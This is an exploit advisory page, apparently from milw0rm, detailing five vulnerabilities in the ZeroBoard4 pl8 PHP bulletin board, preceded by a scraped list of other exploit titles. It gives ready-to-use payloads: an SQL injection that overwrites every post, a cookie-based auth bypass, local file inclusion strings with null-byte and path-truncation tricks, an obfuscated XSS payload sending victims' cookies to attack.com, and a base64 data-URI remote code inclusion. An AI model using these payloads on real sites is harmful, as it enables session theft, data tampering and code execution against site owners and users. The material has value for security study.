
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
147 lines
4.2 KiB
Text
Executable file
147 lines
4.2 KiB
Text
Executable file
ZeroBoard4 pl8 (07.12.17) Multiple Remote/Local Vulnerability
|
|
bY make0day@gmail.com
|
|
thx to : Flyh4t
|
|
/*************************
|
|
|
|
ZeroBoard4 (VERSION pl8 (07.12.17))is most famous and widely used bulletin board system of Korea.
|
|
It is freely available for all platforms that supports PHP and MySQL.
|
|
There are Remote File Inclusion(?), Local File Inclusion, Blind sql injection vulnerability
|
|
XSS, and Secret post view Vulnerability.
|
|
As I know, ZeroBoard4 will not be updated anymore because of zb developer start new project
|
|
that was called zbxe. If you still use zb4, U d better update to XE! :-)
|
|
Here is the details:
|
|
|
|
**************************/
|
|
TEST ON VERSION ZeroBoard4 pl8 (07.12.17)
|
|
Download : http://www.zeroboard.com
|
|
/***************************
|
|
[0x01] Blind SQL Injection Vulnerability
|
|
|
|
/wrtie_ok.php
|
|
|
|
<?
|
|
//set_time_limit(0);
|
|
|
|
include "_head.php";
|
|
|
|
¡Š¡Å
|
|
|
|
@mysql_query("update $t_board"."_$id set headnum='$headnum',prev_no='$prev_no',next_no='$next_no',
|
|
child='$child',depth='$depth',arrangenum='$arrangenum',father='$father',name='$name',email='$email',
|
|
homepage='$homepage',subject='$subject',memo='$memo',sitelink1='$sitelink1',sitelink2='$sitelink2'
|
|
,use_html='$use_html',reply_mail='$reply_mail',is_secret='$is_secret',category='$category'
|
|
$del_que1 $del_que2 where no='$no'") or error(mysql_error());
|
|
//del_que1 and del_qu2 wern`t initialized
|
|
|
|
*************************/
|
|
|
|
poc:
|
|
Well, I`m so lazy person :-(
|
|
I didn`t make a exploit about this vuln.
|
|
BTW, Do you know what is the most important thing?
|
|
Attacker can control all post in same board!
|
|
For example :]
|
|
when attacker set his own post like this :
|
|
title : hola brotha!
|
|
content : Itz party time!
|
|
del_que1 : 1 or 1=1--
|
|
|
|
All post in the same board will be setted same as attacker`s one
|
|
Yeah.. Itz very bad news :-|
|
|
|
|
/***************************
|
|
[0x02] Secret post view Auth bypass Vulnerability
|
|
|
|
/view.php
|
|
//When someone write a post, cookie will be seted
|
|
$secret_str = $setup[no]."_".$no;
|
|
@setcookie("zb_s_check",$secret_str);
|
|
//zb_s_check is just a post number
|
|
|
|
|
|
/write.php
|
|
|
|
//When someone trying to modify his own post,
|
|
//Permission is checked right this:
|
|
|
|
¡Š¡Å
|
|
|
|
if($mode=="modify") {
|
|
|
|
if($data[is_secret]&&!$is_admin&&$data[ismember]!=$member[no]
|
|
&&$HTTP_COOKIE_VARS[zb_s_check]!=$setup[no]."_".$no) error("À»óÀûÀÎ ¹æ¹ýÀž·Î ΚÃۂÃŒŒ¿ä");
|
|
|
|
//If zb_s_check == no than that it will be bypassed
|
|
|
|
|
|
*************************/
|
|
|
|
poc:
|
|
No exploit is needed
|
|
|
|
/***************************
|
|
[0x03] Local file Inclusion Vulnerability
|
|
|
|
/include/write.php
|
|
|
|
if(eregi(":\/\/",$dir)||eregi("\.\.",$dir)) $dir ="./"; //....:)
|
|
|
|
...
|
|
|
|
include $dir."/write.php";
|
|
|
|
//write.php filter :// and ..
|
|
//When we use absolute path, we can bypass filtering! :)
|
|
|
|
*************************/
|
|
|
|
poc:
|
|
dir=C:/Apache/htdocs/bbs/data/board1/make0day.txt%00
|
|
|
|
or
|
|
|
|
//If you have same account in that server
|
|
|
|
dir=/tmp
|
|
|
|
//And Flyh4t said, at some windows server we can ignore '/write.php'
|
|
//By using many '/'.
|
|
//Maybe you can find a clue from below :
|
|
|
|
<?php
|
|
$a='';
|
|
for($i=0;$i<=4071;$i++) {
|
|
$a .= '/';
|
|
}
|
|
$a = 'test.txt'.$a; require_once($a.'.php');
|
|
?>
|
|
|
|
/***************************
|
|
[0x04] XSS
|
|
|
|
poc:
|
|
<img src="make0day" width=0 height=0>
|
|
<img src="make0day" onError=((document.all.tags('img')[0]).src='http://attack.com/c.php?c='+(eval(('D'+'o'+'C'+'u'+'M'+'e'+'N'+'t'+'.'+'C'+'o'+'O'+'k'+'I'+'e').toLowerCase()))) width=0 height=0>
|
|
//GNUBoard final version is also insecure.
|
|
|
|
/***************************
|
|
[0x05] Remote file Inclusion Vulnerability
|
|
|
|
/include/print_category.php
|
|
|
|
if(eregi(":\/\/",$dir)||eregi("^\.",$dir)) $dir ="./"; //Filtering
|
|
|
|
.....
|
|
|
|
include "$dir/category_main.php";
|
|
|
|
//They just filtering :// and .
|
|
//It looks so perfect to detect RFI
|
|
//but with php 5.2 & allow_url_include & register_globals that filtering is not secure
|
|
//By using data:;, we can execute some arbitary php command without %00
|
|
*************************/
|
|
|
|
poc:
|
|
/include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=
|
|
|
|
# milw0rm.com [2009-02-06]
|